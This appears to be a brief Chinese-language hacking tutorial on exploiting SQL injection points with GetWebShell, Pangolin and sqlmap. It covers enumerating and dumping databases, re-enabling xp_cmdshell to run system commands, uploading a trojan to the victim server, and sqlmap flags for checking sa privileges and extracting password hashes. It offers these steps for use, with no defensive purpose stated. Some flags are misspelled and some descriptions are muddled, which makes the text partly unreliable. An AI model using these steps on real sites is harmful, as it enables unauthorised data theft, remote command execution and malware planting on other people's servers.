工具
一·GetWebSell增强版 TOOLs.Net
注入地址:(注入点)
备份路径:(网站根目录)
二·穿山甲
URL:(注入点)
跑完注入点后
按Select all→Go
获取注入点信息
我们可以
获取数据→获取表→获取列→读数据
再按
命令 恢复xp_cmdshell 执行
命令:
net user whoami
然后按
写文件,如下图所示
下面的选项中有一个文件管理,其作用是列磁盘和列目录
下载
把我们的木马下到它的某一个路径下,下好后去命令运行。
三·sql map
cmd中
sqlmap.py -u "注入点"
跑出来后,
cmd中
sqlmap.py -u “注入点” --is-dba
看权限
True的话是sa权限,见下图黄圈左边
sqlmap.py -u “注入点” --current-user
看当前用户名称
sqlmap.py -u “注入点” --privileges
看权限
sqlmap.py -u “注入点” --password
报密码
sqlmap.py -u “注入点” --current-db
看看当前是哪个数据库
如果是test数据库
sqlmap.py -u “注入点” --tables -D test(数据库名) --couent
看test数据库每个表里有多少列
sqlmap.py -u “注入点” --columns -T admin -D test
看test数据库的admin表里有多少数据